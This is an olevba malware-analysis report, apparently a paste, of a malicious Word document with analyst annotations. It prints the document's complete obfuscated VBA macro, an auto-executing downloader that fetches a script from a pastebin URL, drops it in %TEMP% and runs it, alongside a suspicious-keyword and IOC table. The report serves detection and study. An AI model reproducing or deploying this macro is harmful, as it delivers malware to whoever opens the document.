dynamoo

Malicious Word macro

Aug 4th, 2015
  1. olevba 0.31 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. MHT:MASI---V malware.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: malware.doc
  10. Type: MHTML
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: None - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub BHJvsafccc()   ' Thin trampoline: both auto-exec handlers below route here, which then calls the downloader in module nxc.bas.
  16. zzzzzccsdc   ' zzzzzccsdc is defined in VBA/nxc (listed further down in this report).
  17. End Sub
  18. Sub AutoOpen()   ' Word auto-exec entry point: fires when the document is opened and macros are enabled (olevba flags it "AutoExec" below).
  19.     BHJvsafccc
  20. End Sub
  21. Sub Workbook_Open()   ' Excel auto-exec handler name; in a Word document it is dead code, but the same module template would fire in a workbook.
  22.     BHJvsafccc
  23. End Sub
  24. -------------------------------------------------------------------------------
  25. VBA MACRO nxc.bas
  26. in file: None - OLE stream: u'VBA/nxc'
  27. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  ' Stage-1 downloader (annotated for analysis; code below is byte-identical to the olevba dump).
  ' Behaviour visible in this routine: build a URL from reversed ChrW$ fragments, fetch it with
  ' MSXML2.XMLHTTP, write the response body to %TEMP%\nnjBHccs.vbs via Scripting.FileSystemObject,
  ' then launch that file through Shell.Application.Open. The repeated "Dim x, y, z As String" /
  ' LTrim / RTrim triplets are padding: their results are never read, and only the last name of
  ' each multi-variable Dim is actually typed As String.
  ' Detection angles grounded in this code: winword.exe making an outbound HTTP POST, a .vbs being
  ' written under %TEMP%, and a script host started from the Word process tree (the .vbs is opened
  ' by file association, so the child is presumably wscript.exe — confirm in sandbox telemetry).
  28. Sub zzzzzccsdc()
  29. Dim bpXIphzr, ttRrcQMW, ONsvPyQD As String   ' padding group (unused); same pattern repeats between every real statement below
  30. bpXIphzr = "           MQPPSA               "
  31. ttRrcQMW = LTrim(bpXIphzr)
  32. ONsvPyQD = RTrim(ttRrcQMW)
  33.  
  34. mkHJBcsdf = "TEMP"   ' env var name, resolved later with Environ() to locate the drop directory
  35. Dim KllIoMIA, mRUZKkkX, OmDyVeER As String
  36. KllIoMIA = "           LEFDRN               "
  37. mRUZKkkX = LTrim(KllIoMIA)
  38. OmDyVeER = RTrim(mRUZKkkX)
  39.  
  40. nBJaddff = "MSXML2.XMLHTTP"   ' ProgID of the HTTP client object; left in clear text, so a plain string scan catches it
  41. Dim gqwqjvQx, njifLsFU, vzQNJfmu As String
  42. gqwqjvQx = "           TJBGXF               "
  43. njifLsFU = LTrim(gqwqjvQx)
  44. vzQNJfmu = RTrim(njifLsFU)
  45.  
  46. Set pIHJIasdf = CreateObject(nBJaddff)   ' pIHJIasdf = XMLHTTP instance used for the download
  47. Dim RFsQJoJK, bFwCsdgL, wGYoYkSM As String
  48. RFsQJoJK = "           WIICDV               "
  49. bFwCsdgL = LTrim(RFsQJoJK)
  50. wGYoYkSM = RTrim(bFwCsdgL)
  51.  
  52. pKKhbsac = "ttp"   ' URL fragment 2 of 7 ("h" is prepended at line 76)
  53. Dim IIeoErOJ, fEPEHbnO, uMAgYYHd As String
  54. IIeoErOJ = "           YIJTPD               "
  55. fEPEHbnO = LTrim(IIeoErOJ)
  56. uMAgYYHd = RTrim(fEPEHbnO)
  57.  
  58. yDTYuadf = "://pas"   ' URL fragment 3 of 7
  59. Dim lKcgemiT, UIELoylf, XvOxgJTX As String
  60. lKcgemiT = "           BTSWSM               "
  61. UIELoylf = LTrim(lKcgemiT)
  62. XvOxgJTX = RTrim(UIELoylf)
  63.  
  64. ihuHJJdsf = StrReverse(ChrW$(111) & ChrW$(99) & ChrW$(46) & ChrW$(110) & ChrW$(105) & ChrW$(98))   ' "oc.nib" reversed -> "bin.co"
  65. Dim JlMkGXlV, enYmjOwo, aqpigQzU As String
  66. JlMkGXlV = "           MWQKIN               "
  67. enYmjOwo = LTrim(JlMkGXlV)
  68. aqpigQzU = RTrim(enYmjOwo)
  69.  
  70. YGHvvdf = StrReverse(ChrW$(61) & ChrW$(105) & ChrW$(63) & ChrW$(112) & ChrW$(104) & ChrW$(112) & ChrW$(46) & ChrW$(100) & ChrW$(97) & ChrW$(111) & ChrW$(108) & ChrW$(110))   ' "=i?php.daoln" reversed -> "nload.php?i="
  71. Dim czsPxhrZ, lexXJlAR, grYisvBT As String
  72. czsPxhrZ = "           KGICEA               "
  73. lexXJlAR = LTrim(czsPxhrZ)
  74. grYisvBT = RTrim(lexXJlAR)
  75.  
  76. mmmkMKNd = StrReverse(ChrW$(104)) + pKKhbsac + yDTYuadf + StrReverse(ChrW$(101) & ChrW$(116)) + ihuHJJdsf + StrReverse(ChrW$(119) & ChrW$(111) & ChrW$(100) & ChrW$(47) & ChrW$(109)) + YGHvvdf   ' "h"+"ttp"+"://pas"+"te"+"bin.co"+"m/dow"+"nload.php?i=" -> a pastebin.com raw-download URL, paste id still missing
  77. Dim jsfkixUg, XuWDmKby, nzEiIdjV As String
  78. jsfkixUg = "           HSKAQR               "
  79. XuWDmKby = LTrim(jsfkixUg)
  80. nzEiIdjV = RTrim(XuWDmKby)
  81.  
  82. VHVisdfw = mmmkMKNd + StrReverse(ChrW$(51) & ChrW$(75) & ChrW$(84) & ChrW$(53) & ChrW$(100) & ChrW$(89) & ChrW$(114) & ChrW$(48))   ' appends the 8-char paste id (reverse of the ChrW$ run) -> full stage-2 URL; this is the network IOC for this sample
  83. Dim eyzBsPgn, kXiZkwno, MuwxaLpZ As String
  84. eyzBsPgn = "           KSADHZ               "
  85. kXiZkwno = LTrim(eyzBsPgn)
  86. MuwxaLpZ = RTrim(kXiZkwno)
  87.  
  88. Call pIHJIasdf.Open(StrReverse(ChrW$(84) & ChrW$(83) & ChrW$(79) & ChrW$(80)), VHVisdfw, False)   ' "TSOP" reversed -> "POST"; False = synchronous request
  89. Dim KDNLtWtz, tLSXYOod, jBvBocsc As String
  90. KDNLtWtz = "           MTFYHN               "
  91. tLSXYOod = LTrim(KDNLtWtz)
  92. jBvBocsc = RTrim(tLSXYOod)
  93.  
  94. pIHJIasdf.Send   ' no error handling: if the fetch fails, responseText is empty and an empty .vbs is still dropped and launched below
  95. Dim npjkobMZ, xqnREEkR, kqQHVIGT As String
  96. npjkobMZ = "           MLQFXY               "
  97. xqnREEkR = LTrim(npjkobMZ)
  98. kqQHVIGT = RTrim(xqnREEkR)
  99.  
  100. dyEYTasd = StrReverse(ChrW$(116) & ChrW$(99) & ChrW$(101) & ChrW$(106) & ChrW$(98) & ChrW$(79) & ChrW$(109) & ChrW$(101) & ChrW$(116) & ChrW$(115) & ChrW$(121) & ChrW$(83) & ChrW$(101) & ChrW$(108) & ChrW$(105) & ChrW$(70) & ChrW$(46) & ChrW$(103) & ChrW$(110) & ChrW$(105) & ChrW$(116) & ChrW$(112) & ChrW$(105) & ChrW$(114) & ChrW$(99) & ChrW$(83))   ' reversed -> "Scripting.FileSystemObject"
  101. Dim xeQAcRYS, aVlXPBcR, MgpUAyDi As String
  102. xeQAcRYS = "           NKOFUN               "
  103. aVlXPBcR = LTrim(xeQAcRYS)
  104. MgpUAyDi = RTrim(aVlXPBcR)
  105.  
  106. Set nJHOsdff = CreateObject(dyEYTasd)   ' nJHOsdff = FileSystemObject
  107. Dim aLlTJBDR, EtIbnxxB, KMFeTiIU As String
  108. aLlTJBDR = "           HTPEYP               "
  109. EtIbnxxB = LTrim(aLlTJBDR)
  110. KMFeTiIU = RTrim(EtIbnxxB)
  111.  
  112.    yyYHJKsdfv = Environ(mkHJBcsdf) & StrReverse(ChrW$(115) & ChrW$(98) & ChrW$(118) & ChrW$(46) & ChrW$(115) & ChrW$(99) & ChrW$(99) & ChrW$(72) & ChrW$(66) & ChrW$(106) & ChrW$(110) & ChrW$(110) & ChrW$(92))   ' %TEMP% & "\nnjBHccs.vbs" (reverse of "sbv.sccHBjnn\"); matches the IOC row in the summary table
  113. Dim TGZPOwhL, JWgDsplr, eaaHDCwf As String
  114. TGZPOwhL = "           FYZAYD               "
  115. JWgDsplr = LTrim(TGZPOwhL)
  116. eaaHDCwf = RTrim(JWgDsplr)
  117.  
  118. Set casasddd = nJHOsdff.CreateTextFile(yyYHJKsdfv, 2)   ' second argument is the overwrite flag; a non-zero value presumably coerces to True — confirm
  119. Dim jJUevPkl, sKKhLGGl, iLzAfLdw As String
  120. jJUevPkl = "           GPLURS               "
  121. sKKhLGGl = LTrim(jJUevPkl)
  122. iLzAfLdw = RTrim(sKKhLGGl)
  123.  
  124. casasddd.Write pIHJIasdf.responseText   ' stage-2 script is written verbatim as fetched (no decoding step here)
  125. Dim HjjttiWj, msBbkESo, NuYMRVRa As String
  126. HjjttiWj = "           EFMMOX               "
  127. msBbkESo = LTrim(HjjttiWj)
  128. NuYMRVRa = RTrim(msBbkESo)
  129.  
  130. casasddd.Close
  131. Dim XNaeMehp, vshCEnBR, DzwnIsqd As String
  132. XNaeMehp = "           WLTCXT               "
  133. vshCEnBR = LTrim(XNaeMehp)
  134. DzwnIsqd = RTrim(vshCEnBR)
  135.  
  136. yytTcbcn = StrReverse(ChrW$(110) & ChrW$(111) & ChrW$(105) & ChrW$(116) & ChrW$(97) & ChrW$(99) & ChrW$(105) & ChrW$(108) & ChrW$(112) & ChrW$(112) & ChrW$(65) & ChrW$(46) & ChrW$(108) & ChrW$(108) & ChrW$(101) & ChrW$(104) & ChrW$(83))   ' reversed -> "Shell.Application"
  137. Dim HzSBMocU, zivzwCnK, ffqtVPRe As String
  138. HzSBMocU = "           LSUOQY               "
  139. zivzwCnK = LTrim(HzSBMocU)
  140. ffqtVPRe = RTrim(zivzwCnK)
  141.  
  142. Set chgdTYasd = CreateObject(yytTcbcn)   ' chgdTYasd = Shell.Application
  143. chgdTYasd.Open Environ(mkHJBcsdf) & StrReverse(ChrW$(115) & ChrW$(98) & ChrW$(118) & ChrW$(46) & ChrW$(115) & ChrW$(99) & ChrW$(99) & ChrW$(72) & ChrW$(66) & ChrW$(106) & ChrW$(110) & ChrW$(110) & ChrW$(92))   ' rebuilds the same %TEMP%\nnjBHccs.vbs path and opens it, i.e. executes the dropped script; no cleanup of the file afterwards
  144. End Sub
  145.  
  146.  
  147. -------------------------------------------------------------------------------
  148. VBA MACRO Class1.cls
  149. in file: None - OLE stream: u'VBA/Class1'
  150. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  151. (empty macro)
  152. -------------------------------------------------------------------------------
  153. VBA MACRO Class2.cls
  154. in file: None - OLE stream: u'VBA/Class2'
  155. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  156. (empty macro)
  157. -------------------------------------------------------------------------------
  158. VBA MACRO Class3.cls
  159. in file: None - OLE stream: u'VBA/Class3'
  160. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  161. (empty macro)
  162. -------------------------------------------------------------------------------
  163. VBA MACRO Class4.cls
  164. in file: None - OLE stream: u'VBA/Class4'
  165. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  166. (empty macro)
  167. -------------------------------------------------------------------------------
  168. VBA MACRO Class5.cls
  169. in file: None - OLE stream: u'VBA/Class5'
  170. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  171. (empty macro)
  172. -------------------------------------------------------------------------------
  173. VBA MACRO Class6.cls
  174. in file: None - OLE stream: u'VBA/Class6'
  175. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  176. (empty macro)
  177. -------------------------------------------------------------------------------
  178. VBA MACRO Class7.cls
  179. in file: None - OLE stream: u'VBA/Class7'
  180. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  181. (empty macro)
  182. -------------------------------------------------------------------------------
  183. VBA MACRO Class8.cls
  184. in file: None - OLE stream: u'VBA/Class8'
  185. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  186. (empty macro)
  187. -------------------------------------------------------------------------------
  188. VBA MACRO Class9.cls
  189. in file: None - OLE stream: u'VBA/Class9'
  190. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  191. (empty macro)
  192. -------------------------------------------------------------------------------
  193. VBA MACRO Class10.cls
  194. in file: None - OLE stream: u'VBA/Class10'
  195. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  196. (empty macro)
  197. -------------------------------------------------------------------------------
  198. VBA MACRO Class11.cls
  199. in file: None - OLE stream: u'VBA/Class11'
  200. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  201. (empty macro)
  202. +------------+----------------------+-----------------------------------------+
  203. | Type       | Keyword              | Description                             |
  204. +------------+----------------------+-----------------------------------------+
  205. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  206. | AutoExec   | Workbook_Open        | Runs when the Excel Workbook is opened  |
  207. | Suspicious | Open                 | May open a file                         |
  208. | Suspicious | CreateObject         | May create an OLE object                |
  209. | Suspicious | ChrW                 | May attempt to obfuscate specific       |
  210. |            |                      | strings                                 |
  211. | Suspicious | StrReverse           | May attempt to obfuscate specific       |
  212. |            |                      | strings                                 |
  213. | Suspicious | CreateTextFile       | May create a text file                  |
  214. | Suspicious | Environ              | May read system environment variables   |
  215. | Suspicious | Write                | May write to a file (if combined with   |
  216. |            |                      | Open)                                   |
  217. | Suspicious | Msxml2.XMLHTTP       | May download files from the Internet    |
  218. | Suspicious | Shell                | May run an executable file or a system  |
  219. |            |                      | command (obfuscation: VBA expression)   |
  220. | Suspicious | Shell.Application    | May run an application (if combined     |
  221. |            |                      | with CreateObject) (obfuscation: VBA    |
  222. |            |                      | expression)                             |
  223. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  224. |            | Strings              | may be used to obfuscate strings        |
  225. |            |                      | (option --decode to see all)            |
  226. | IOC        | nnjBHccs.vbs         | Executable file name (obfuscation: VBA  |
  227. |            |                      | expression)                             |
  228. +------------+----------------------+-----------------------------------------+
